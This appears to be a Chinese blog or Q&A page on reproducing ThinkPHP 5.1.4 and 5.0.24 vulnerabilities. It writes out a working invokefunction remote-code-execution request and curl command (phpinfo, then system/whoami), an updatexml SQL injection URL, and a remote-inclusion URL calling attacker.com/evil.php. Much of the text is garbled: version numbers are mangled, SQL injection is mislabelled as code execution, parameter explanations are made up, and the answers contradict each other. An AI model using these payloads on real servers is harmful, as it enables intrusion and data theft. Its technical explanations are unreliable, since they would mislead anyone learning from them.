Thinkphp5.1.4漏洞复现

ThinkPHP 5.1.4 存在的两个漏洞：

- 20190307 ThinkPHP 5.1.4 远程代码执行漏洞
- 20190308 ThinkPHP 5.1.4 命令执行漏洞

这两个漏洞都是由于 ThinkPHP 5.1.4 中存在的一个路由注入漏洞导致的。

这里以远程代码执行漏洞为例，漏洞利用过程如下：

1. 构造恶意请求

构造如下请求：

POST /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 HTTP/1.1
Host: target.com
Content-Length: 0

其中 `function` 参数值表示要执行的函数名，这里使用的是 `phpinfo`，`vars[1][]` 参数用于绕过参数值为负数的检测。

2. 发送恶意请求

使用 curl 或者其他工具发送恶意请求。

curl -X POST "http://target.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1"

3. 验证漏洞是否存在

如果返回了 phpinfo 的信息，则漏洞存在。

4. 修复漏洞

升级到最新版本的 ThinkPHP，或者手动修复该漏洞。

相关问题

Thinkphp5.1.4漏洞绕过宝塔防火墙

首先需要明确的是，宝塔防火墙只是一种基于规则的防御方式，而不是万能的。如果攻击者能够找到漏洞并成功利用它，那么宝塔防火墙也无法完全阻止攻击。

关于 ThinkPHP 5.1.4 漏洞，其主要是由于框架中对于控制器不存在的情况下，会默认调用空控制器中的方法，而攻击者可以通过构造特定的 URL，使得控制器不存在，从而绕过权限验证，执行任意代码。

针对这种漏洞，可以采取以下一些措施进行防御：

1. 及时升级框架版本，使用最新版的框架能够有效地避免已知漏洞。

2. 尽可能地使用框架提供的安全机制，如 CSRF 令牌、XSS 过滤等。

3. 配置好 Web 服务器的安全策略，如限制上传文件类型、禁止访问某些关键目录等。

4. 对于敏感操作，可以采取多重验证措施，如要求用户输入验证码、二次确认等。

5. 在代码中对用户输入的数据进行严格的过滤和验证，避免被攻击者构造恶意请求。

总之，对于 Web 应用的安全，需要综合考虑多个方面，不能仅仅依靠某一种安全机制。

thinkphp5.0.24漏洞复现

### 回答1：
thinkphp5..24漏洞是指在thinkphp5..24版本中存在的安全漏洞，攻击者可以利用该漏洞进行远程代码执行，从而获取系统权限和敏感信息。

具体的复现方法可以参考以下步骤：

1. 下载thinkphp5..24版本，并安装在本地环境中。

2. 在安装目录下创建一个名为test的控制器，并在该控制器中添加以下代码：

public function index(){
    $id = input('id');
    $data = Db::table('user')->where('id',$id)->find();
    echo $data['username'];
}

3. 在浏览器中访问以下URL，可以看到输出了数据库中id为1的用户的用户名：

http://localhost/test/index/id/1

4. 然后在URL中添加如下代码：

http://localhost/test/index/id/1%27%20or%20updatexml(1,concat(x7e,(select%20user()),x7e),1)%23

5. 访问以上URL，可以看到输出了当前数据库用户的用户名，这说明攻击者已经成功利用漏洞进行了远程代码执行。

为了避免该漏洞的攻击，建议及时升级到最新版本的thinkphp，并对代码进行安全审计和加固。

### 回答2：
ThinkPHP是一款开源PHP框架，其在PHP开发界中广受欢迎。但是，ThinkPHP的版本5.0.24中存在一个安全漏洞，使得攻击者可以通过构造恶意请求，从而执行远程命令。

该漏洞源于ThinkPHP在解析控制器名称时，没有对用户输入进行严格的过滤和检查。攻击者可以通过将危险字符（例如：|、&、;）嵌入控制器名称中，从而在解析控制器名称时实现远程命令执行。

具体来说，攻击者可以发送特制请求（如下所示），欺骗服务器解析URL时误认为用户已经请求了一个控制器，而实际上解析过程中会将参数逐个拼接在控制器名称上，进而达到远程执行该参数所代表的命令的目的。

请求示例：
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

上述请求的意思是调用名为“\think\app\InvokeFunction”类中的“call_user_func_array”函数，并将函数的两个参数设置为“system”和“whoami”。

为了防止该漏洞对服务器造成危害，建议用户尽快升级到最新的版本。同时，在开发过程中应该严格对用户输入进行过滤和检查，防止恶意用户伪造恶意请求。

### 回答3：
ThinkPHP是一种使用PHP编程语言开发的快速开发框架。由于其易用性和灵活性，它已经成为许多Web应用程序开发人员的首选平台。但是，由于某些漏洞，它也成为了黑客攻击的目标。其中之一是ThinkPHP5.0.24漏洞。接下来我们将介绍如何复现这个漏洞。

ThinkPHP5.0.24漏洞是一个远程文件包含漏洞，可以允许攻击者通过构造特殊的请求从远程服务器获取敏感文件。攻击者可以利用这个漏洞来获取敏感信息，甚至可以执行任意代码来获取服务器的完全控制权。

首先，我们需要下载并安装一个Web服务器，例如Apache或Nginx。然后，我们需要下载并安装最新版本的ThinkPHP5.0.24框架。一旦安装完成，我们可以在Web服务器中设置虚拟主机，将其指向我们的ThinkPHP安装目录。接下来，我们需要了解漏洞原理和复现方法。

漏洞原理是由于ThinkPHP在实现远程文件包含时没有进行验证，导致攻击者可以构造特殊的url路径来访问远程服务器上的文件。为了从远程服务器获取文件，攻击者可以构造以下请求：

http://example.com/index.php/index/index?key[]=value&key[]=file://attacker.com/evil.php

在这个例子中，攻击者可以使用key参数来传递用户输入，而当用户输入的值被放入一个数组中时，攻击者可以在数组中添加一个特殊的值，其中包含一个远程代码执行的url。当参数被解析时，程序会读取并执行这个url。

为了复现漏洞，我们可以将上面的请求放入浏览器中尝试访问。攻击者可以将其替换为自己的恶意url，然后在远程服务器上执行恶意代码。如果成功，攻击者就可以获取服务器上的敏感文件或执行任意代码。

总结：ThinkPHP5.0.24漏洞是一种远程文件包含漏洞，可以允许攻击者通过构造特殊的请求从远程服务器获取敏感文件。漏洞的复现方法是构造一个包含一个特殊的url的请求，并将其发送到目标服务器。为了防止此类攻击，我们建议使用最新版本的程序，并始终对用户输入进行适当的验证和过滤。